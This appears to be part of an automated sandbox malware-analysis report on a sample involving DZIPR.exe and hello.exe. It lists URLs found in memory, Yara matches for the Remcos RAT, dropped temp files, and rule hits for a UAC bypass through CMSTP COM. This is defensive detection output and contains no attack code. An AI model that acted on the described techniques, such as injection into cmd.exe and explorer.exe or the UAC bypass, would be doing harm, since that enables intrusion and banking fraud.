00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                      Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0L
                      Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                      Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                      Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                      Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s2.symcb.com0
                      Source: DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://support.datanumen.com
                      Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0a
                      Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
                      Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcd.com0&
                      Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                      Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                      Source: DZIPR.exe, 0000000C.00000002.1398577312.000000000353D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.0000000005524000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F1C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A19000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.0000000005225000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.000000000514A000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.000000000552B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
                      Source: DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.repairfile.com
                      Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
                      Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000002.1398188269.000000000343A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
                      Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0
                      Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0/
                      Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                      Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                      Source: edb.log.18.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
                      Source: svchost.exe, 00000012.00000003.1494645538.00000174C5570000.00000004.00000800.00020000.00000000.sdmp, edb.log.18.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
                      Source: DZIPR.exe.12.drString found in binary or memory: https://www.datanumen.com/%https://www.datanumen.com/zip-repair/
                      Source: DZIPR.exe.12.drString found in binary or memory: https://www.datanumen.com/contact/0https://www.datanumen.com/update/dzipr/dzipr.inf
                      Source: DZIPR.exe.12.drString found in binary or memory: https://www.datanumen.com/support/
                      Source: DZIPR.exe.12.drString found in binary or memory: https://www.datanumen.com/zip-repair-order/2https://www.datanumen.com/socialmedia/facebook.htm
                      Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.datanumen.com/zip-repair/
                      Source: DZIPR.exe, 0000000C.00000002.1398188269.000000000343A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.c
                      Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                      Source: C:\Users\user\DZIPR.exeCode function: 12_2_6FE304EE GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageW,12_2_6FE304EE
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 13_2_6C9204EE GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageW,13_2_6C9204EE
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 19_2_6FEB04EE GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageW,19_2_6FEB04EE
                      Source: Yara matchFile source: 20.2.cmd.exe.55000c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.cmd.exe.5ff00c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.cmd.exe.57d00c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.cmd.exe.5ff00c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.cmd.exe.58300c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.cmd.exe.57d00c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.cmd.exe.55000c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.cmd.exe.58300c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001A.00000002.1827230846.00000000005CF000.00000008.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.1679023505.00000000004F9000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.2074816955.0000000000369000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.2008670032.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 7620, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 8068, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 8164, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 6732, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4044, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 6116, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2056, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1180, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\paogviura, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\lejp, type: DROPPED

                      E-Banking Fraud

                      barindex
                      Source: Yara matchFile source: 20.2.cmd.exe.55000c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.cmd.exe.5ff00c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.cmd.exe.57d00c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.cmd.exe.5ff00c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.cmd.exe.58300c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.cmd.exe.57d00c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.cmd.exe.55000c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.cmd.exe.58300c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000016.00000002.1679023505.00000000004F9000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.2074816955.0000000000369000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.2008670032.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 7620, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 8068, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 8164, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 6732, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4044, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 6116, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2056, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1180, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\paogviura, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\lejp, type: DROPPED

                      System Summary

                      barindex
                      Source: 20.2.cmd.exe.4fb0b57.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 32.2.explorer.exe.55bfb57.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 24.2.cmd.exe.52ba757.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 14.2.cmd.exe.5573a8a.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 12.2.DZIPR.exe.35e05ce.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 22.2.explorer.exe.4a68a8a.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 12.2.DZIPR.exe.359a901.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 20.2.cmd.exe.55000c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 20.2.cmd.exe.55000c8.7.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 20.2.cmd.exe.55000c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 14.2.cmd.exe.5ff00c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 14.2.cmd.exe.5ff00c8.7.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 14.2.cmd.exe.5ff00c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 14.2.cmd.exe.55b8b57.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 32.2.explorer.exe.55c0757.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 28.2.cmd.exe.57d00c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 28.2.cmd.exe.57d00c8.7.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 28.2.cmd.exe.57d00c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 14.2.cmd.exe.5ff00c8.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 14.2.cmd.exe.5ff00c8.7.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 14.2.cmd.exe.5ff00c8.7.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 22.2.explorer.exe.4aae757.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 26.2.explorer.exe.cc8b57.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 24.2.cmd.exe.58300c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 24.2.cmd.exe.58300c8.7.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 24.2.cmd.exe.58300c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 28.2.cmd.exe.57d00c8.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 28.2.cmd.exe.57d00c8.7.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 28.2.cmd.exe.57d00c8.7.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 33.2.explorer.exe.474ab57.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 28.2.cmd.exe.5199a8a.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
